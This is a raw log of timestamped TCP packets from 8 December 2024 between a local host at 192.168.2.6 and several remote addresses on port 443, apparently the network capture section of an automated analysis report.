Dec 8, 2024 13:31:24.468944073 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.468967915 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.469054937 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.469063997 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.469124079 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.474473953 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.474493027 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.474560022 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.474567890 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.474623919 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.480451107 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.480470896 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.480551958 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.480560064 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.480606079 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.480628967 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.498951912 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.498974085 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.499041080 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.499063015 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.499093056 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.499223948 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.510912895 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.510930061 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.510983944 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.510991096 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.511037111 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.520667076 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.520688057 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.520742893 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.520750046 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.520818949 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.520837069 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.531425953 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.531445980 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.531490088 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.531497955 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.531553030 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.541275024 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.541292906 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.541387081 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.541397095 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.541435957 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.551850080 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.551866055 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.551933050 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.551945925 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.551975012 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.551992893 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.556854963 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.556886911 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.556976080 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.556988955 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.557018995 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.557033062 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.562427998 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.562444925 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.562532902 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.562540054 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.562845945 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.563808918 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.563842058 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.564121962 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.615349054 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.615386009 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.615487099 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.624661922 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.624721050 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.624855995 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.631882906 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.631901979 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.635442019 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.635457039 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.638338089 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.638360023 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.638422966 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.638432980 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.638468981 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.638488054 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.638870955 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.638920069 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.638926983 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.638955116 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.638961077 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.638993025 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.641335011 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.641350985 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.682881117 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.682898998 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.682965040 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.682976007 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.683098078 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.690851927 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.690867901 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.690924883 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.690932035 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.690970898 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.697787046 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.697803974 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.697873116 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.697879076 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.697902918 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.697922945 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.705667019 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.705684900 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.705750942 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.705760956 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.705811024 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.713433981 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.713458061 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.713527918 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.713534117 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.713576078 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.720941067 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.720957041 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.721045017 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.721051931 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.721087933 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.728818893 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.728835106 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.728930950 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.728936911 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.729047060 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.735877991 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.735894918 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.735965967 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.735972881 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.736012936 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.875516891 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.875535011 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.875627995 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.875642061 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.875683069 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.876301050 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.876342058 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.876416922 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.290231943 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.296986103 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.297019958 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.297157049 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.297254086 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.297297001 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.297408104 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.297652006 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.297661066 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.297739029 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.298043013 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.298075914 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.298389912 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.298734903 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.298747063 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.298912048 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.298927069 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.299161911 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.299179077 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.299396992 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:25.299406052 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:25.300071001 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.300081015 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.300570011 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.300575018 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.304852009 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.304996967 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.536114931 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.538079023 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.538098097 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.618197918 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.618235111 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.620551109 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.620560884 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.621424913 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:25.621447086 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:25.621609926 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:25.621618986 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:25.621741056 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:25.621790886 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:25.624527931 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.625004053 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.625015974 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.635135889 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.635158062 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.637449026 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.637475967 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.723763943 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.723824024 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.724330902 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.724427938 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.724464893 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.724499941 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.724515915 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.727072001 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.727109909 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.727190971 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.727591038 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:25.727601051 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:25.980009079 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.980038881 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.980057955 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.980087996 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.980087996 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.980108976 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:25.980143070 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:25.980165005 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.084999084 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:26.085084915 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.085103035 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:26.085130930 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:26.085160971 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.085187912 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.090939999 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.090955019 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:26.090961933 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.091005087 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.093348026 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.093395948 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:26.093519926 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.132745981 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:26.132764101 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:26.165190935 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.165216923 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.165323019 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.165352106 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.165390968 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.165586948 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.166016102 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.166027069 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.166482925 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.166486979 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.216836929 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.216856003 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.216916084 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.216937065 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.216959953 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.216975927 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.340337038 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.340359926 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.340408087 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.340428114 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.340457916 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.340482950 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.347901106 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.348273039 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.348304033 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.348716021 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.348721981 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.358998060 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.360661983 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.360682964 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.361164093 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.361169100 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.378103018 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.378134012 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.378210068 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.378225088 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.378283978 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.414748907 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.414768934 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.414830923 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.414844036 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.414891958 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.450267076 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.450288057 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.450345993 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.450357914 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.450401068 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.525896072 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.525934935 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.525959969 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.525971889 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.526000023 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.526019096 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.550620079 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.550638914 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.550700903 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.550712109 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.550751925 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.573158026 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.573184013 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.573224068 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.573234081 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.573271990 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.573287964 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.590725899 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.590744972 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.590802908 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.590809107 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.590866089 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.602686882 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.602730036 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.602744102 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.602746010 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.602793932 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.602807999 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.602838993 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.602842093 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.602853060 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.603112936 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.603132010 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.603143930 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.603149891 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.606029034 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.606062889 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.606154919 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.606307983 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.606317043 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.614875078 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.614895105 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.614976883 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.614989042 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.615133047 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.712399006 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.712429047 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.712490082 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.712505102 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.712544918 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.722815037 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.722834110 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.722897053 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.722904921 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.722944975 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.734142065 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.734164953 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.734208107 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.734220982 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.734251022 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.734272003 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.744246006 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.744261026 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.744313002 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.744319916 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.744355917 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.752595901 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.752610922 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.752754927 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.752763033 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.752800941 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.762821913 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.762845039 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.762880087 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.762885094 CET	443	49753	150.171.27.10	192.168.2.6
